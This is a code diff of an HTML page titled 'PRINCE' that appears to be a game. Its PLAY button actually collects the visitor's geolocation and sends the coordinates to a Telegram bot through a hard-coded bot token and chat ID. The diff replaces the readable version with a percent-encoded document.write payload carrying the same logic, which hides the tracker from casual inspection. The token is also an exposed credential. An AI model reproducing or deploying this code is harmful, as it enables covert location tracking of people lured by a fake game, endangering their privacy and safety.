--- a/index.html
+++ b/index.html
@@ -1,100 +1,4 @@
-<!DOCTYPE html>
-<html>
-<head>
-    <title></title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Responsive meta tag -->
-    <style>
-        body {
-            background-color: black;
-            color: white;
-            font-family: Arial, sans-serif;
-            text-align: center;
-            padding: 20px;
-            margin: 0; /* Remove default margin */
-        }
-        h1 {
-            font-size: 24px; /* Adjust font size for mobile */
-        }
-        button {
-            padding: 10px 20px; /* Add padding to the button */
-            font-size: 16px; /* Adjust button font size */
-            cursor: pointer; /* Change cursor on hover */
-        }
-    </style>
-</head>
-<body>
-    <h1>PRINCE</h1>
-    <button onclick="getLocation()">PLAY</button>
-    <p id="status"></p>
-
-    <script>
-        function getLocation() {
-            if (navigator.geolocation) {
-                navigator.geolocation.getCurrentPosition(sendLocation, showError);
-            } else {
-                document.getElementById("status").textContent = " not supported by this browser.";
-            }
-        }
-
-        function sendLocation(position) {
-            var latitude = position.coords.latitude;
-            var longitude = position.coords.longitude;
-
-            document.getElementById("status").textContent = "OPENING";
-
-            var token = '6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es'; // Replace with your bot token
-            var chatId = '5112680061'; // Replace with your chat ID
-            var message = `Location: Latitude ${latitude}, Longitude ${longitude}`;
-
-            var url = `https://api.telegram.org/bot${token}/sendMessage`;
-
-            var data = {
-                chat_id: chatId,
-                text: message
-            };
-
-            fetch(url, {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json'
-                },
-                body: JSON.stringify(data)
-            })
-            .then(response => {
-                if (!response.ok) {
-                    throw new Error(`HTTP error! status: ${response.status}`);
-                }
-                return response.json();
-            })
-            .then(data => {
-                if (data.ok) {
-                    document.getElementById("status").textContent = "";
-                } else {
-                    document.getElementById("status").textContent = "Failed: " + data.description;
-                }
-            })
-            .catch(error => {
-                document.getElementById("status").textContent = "Error sending: " + error.message;
-                console.error('Error:', error);
-            });
-        }
-
-        function showError(error) {
-            switch(error.code) {
-                case error.PERMISSION_DENIED:
-                    document.getElementById("status").textContent = "User denied the request";
-                    break;
-                case error.POSITION_UNAVAILABLE:
-                    document.getElementById("status").textContent = "Information is unavailable.";
-                    break;
-                case error.TIMEOUT:
-                    document.getElementById("status").textContent = "The request to get user timeout.";
-                    break;
-                case error.UNKNOWN_ERROR:
-                    document.getElementById("status").textContent = "An unknown error occurred.";
-                    break;
-            }
-        }
-    </script>
-</body>
-</html>
+<script>
+<!-- code by BERLIN  -->
+document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%20%3C%21%2D%2D%20%52%65%73%70%6F%6E%73%69%76%65%20%6D%65%74%61%20%74%61%67%20%2D%2D%3E%0A%20%20%20%20%3C%73%74%79%6C%65%3E%0A%20%20%20%20%20%20%20%20%62%6F%64%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%62%6C%61%63%6B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6C%6F%72%3A%20%77%68%69%74%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%41%72%69%61%6C%2C%20%73%61%6E%73%2D%73%65%72%69%66%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%64%64%69%6E%67%3A%20%32%30%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%72%67%69%6E%3A%20%30%3B%20%2F%2A%20%52%65%6D%6F%76%65%20%64%65%66%61%75%6C%74%20%6D%61%72%67%69%6E%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%68%31%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%32%34%70%78%3B%20%2F%2A%20%41%64%6A%75%73%74%20%66%6F%6E%74%20%73%69%7A%65%20%66%6F%72%20%6D%6F%62%69%6C%65%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%62%75%74%74%6F%6E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%64%64%69%6E%67%3A%20%31%30%70%78%20%32%30%70%78%3B%20%2F%2A%20%41%64%64%20%70%61%64%64%69%6E%67%20%74%6F%20%74%68%65%20%62%75%74%74%6F%6E%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%36%70%78%3B%20%2F%2A%20%41%64%6A%75%73%74%20%62%75%74%74%6F%6E%20%66%6F%6E%74%20%73%69%7A%65%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%75%72%73%6F%72%3A%20%70%6F%69%6E%74%65%72%3B%20%2F%2A%20%43%68%61%6E%67%65%20%63%75%72%73%6F%72%20%6F%6E%20%68%6F%76%65%72%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%20%20%20%20%3C%68%31%3E%50%52%49%4E%43%45%3C%2F%68%31%3E%0A%20%20%20%20%3C%62%75%74%74%6F%6E%20%6F%6E%63%6C%69%63%6B%3D%22%67%65%74%4C%6F%63%61%74%69%6F%6E%28%29%22%3E%50%4C%41%59%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%3C%70%20%69%64%3D%22%73%74%61%74%75%73%22%3E%3C%2F%70%3E%0A%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%67%65%74%4C%6F%63%61%74%69%6F%6E%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%6E%61%76%69%67%61%74%6F%72%2E%67%65%6F%6C%6F%63%61%74%69%6F%6E%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6E%61%76%69%67%61%74%6F%72%2E%67%65%6F%6C%6F%63%61%74%69%6F%6E%2E%67%65%74%43%75%72%72%65%6E%74%50%6F%73%69%74%69%6F%6E%28%73%65%6E%64%4C%6F%63%61%74%69%6F%6E%2C%20%73%68%6F%77%45%72%72%6F%72%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%20%6E%6F%74%20%73%75%70%70%6F%72%74%65%64%20%62%79%20%74%68%69%73%20%62%72%6F%77%73%65%72%2E%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%73%65%6E%64%4C%6F%63%61%74%69%6F%6E%28%70%6F%73%69%74%69%6F%6E%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%6C%61%74%69%74%75%64%65%20%3D%20%70%6F%73%69%74%69%6F%6E%2E%63%6F%6F%72%64%73%2E%6C%61%74%69%74%75%64%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%6C%6F%6E%67%69%74%75%64%65%20%3D%20%70%6F%73%69%74%69%6F%6E%2E%63%6F%6F%72%64%73%2E%6C%6F%6E%67%69%74%75%64%65%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%4F%50%45%4E%49%4E%47%22%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%74%6F%6B%65%6E%20%3D%20%27%36%31%39%37%37%34%37%34%34%38%3A%41%41%46%72%67%58%65%5A%64%6A%51%5A%31%69%54%6D%39%41%45%36%76%35%36%68%36%79%2D%71%53%68%69%48%35%65%73%27%3B%20%2F%2F%20%52%65%70%6C%61%63%65%20%77%69%74%68%20%79%6F%75%72%20%62%6F%74%20%74%6F%6B%65%6E%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%63%68%61%74%49%64%20%3D%20%27%35%31%31%32%36%38%30%30%36%31%27%3B%20%2F%2F%20%52%65%70%6C%61%63%65%20%77%69%74%68%20%79%6F%75%72%20%63%68%61%74%20%49%44%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%6D%65%73%73%61%67%65%20%3D%20%60%4C%6F%63%61%74%69%6F%6E%3A%20%4C%61%74%69%74%75%64%65%20%24%7B%6C%61%74%69%74%75%64%65%7D%2C%20%4C%6F%6E%67%69%74%75%64%65%20%24%7B%6C%6F%6E%67%69%74%75%64%65%7D%60%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%75%72%6C%20%3D%20%60%68%74%74%70%73%3A%2F%2F%61%70%69%2E%74%65%6C%65%67%72%61%6D%2E%6F%72%67%2F%62%6F%74%24%7B%74%6F%6B%65%6E%7D%2F%73%65%6E%64%4D%65%73%73%61%67%65%60%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%64%61%74%61%20%3D%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%68%61%74%5F%69%64%3A%20%63%68%61%74%49%64%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%65%78%74%3A%20%6D%65%73%73%61%67%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%65%74%63%68%28%75%72%6C%2C%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6D%65%74%68%6F%64%3A%20%27%50%4F%53%54%27%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%68%65%61%64%65%72%73%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%43%6F%6E%74%65%6E%74%2D%54%79%70%65%27%3A%20%27%61%70%70%6C%69%63%61%74%69%6F%6E%2F%6A%73%6F%6E%27%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%6F%64%79%3A%20%4A%53%4F%4E%2E%73%74%72%69%6E%67%69%66%79%28%64%61%74%61%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%74%68%65%6E%28%72%65%73%70%6F%6E%73%65%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%21%72%65%73%70%6F%6E%73%65%2E%6F%6B%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%72%6F%77%20%6E%65%77%20%45%72%72%6F%72%28%60%48%54%54%50%20%65%72%72%6F%72%21%20%73%74%61%74%75%73%3A%20%24%7B%72%65%73%70%6F%6E%73%65%2E%73%74%61%74%75%73%7D%60%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%72%65%73%70%6F%6E%73%65%2E%6A%73%6F%6E%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%74%68%65%6E%28%64%61%74%61%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%64%61%74%61%2E%6F%6B%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%46%61%69%6C%65%64%3A%20%22%20%2B%20%64%61%74%61%2E%64%65%73%63%72%69%70%74%69%6F%6E%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%63%61%74%63%68%28%65%72%72%6F%72%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%45%72%72%6F%72%20%73%65%6E%64%69%6E%67%3A%20%22%20%2B%20%65%72%72%6F%72%2E%6D%65%73%73%61%67%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%65%72%72%6F%72%28%27%45%72%72%6F%72%3A%27%2C%20%65%72%72%6F%72%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%73%68%6F%77%45%72%72%6F%72%28%65%72%72%6F%72%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%77%69%74%63%68%28%65%72%72%6F%72%2E%63%6F%64%65%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6F%72%2E%50%45%52%4D%49%53%53%49%4F%4E%5F%44%45%4E%49%45%44%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%55%73%65%72%20%64%65%6E%69%65%64%20%74%68%65%20%72%65%71%75%65%73%74%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%72%65%61%6B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6F%72%2E%50%4F%53%49%54%49%4F%4E%5F%55%4E%41%56%41%49%4C%41%42%4C%45%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%49%6E%66%6F%72%6D%61%74%69%6F%6E%20%69%73%20%75%6E%61%76%61%69%6C%61%62%6C%65%2E%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%72%65%61%6B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6F%72%2E%54%49%4D%45%4F%55%54%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%54%68%65%20%72%65%71%75%65%73%74%20%74%6F%20%67%65%74%20%75%73%65%72%20%74%69%6D%65%6F%75%74%2E%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%72%65%61%6B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%61%73%65%20%65%72%72%6F%72%2E%55%4E%4B%4E%4F%57%4E%5F%45%52%52%4F%52%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%73%74%61%74%75%73%22%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%22%41%6E%20%75%6E%6B%6E%6F%77%6E%20%65%72%72%6F%72%20%6F%63%63%75%72%72%65%64%2E%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%72%65%61%6B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));
+</script>
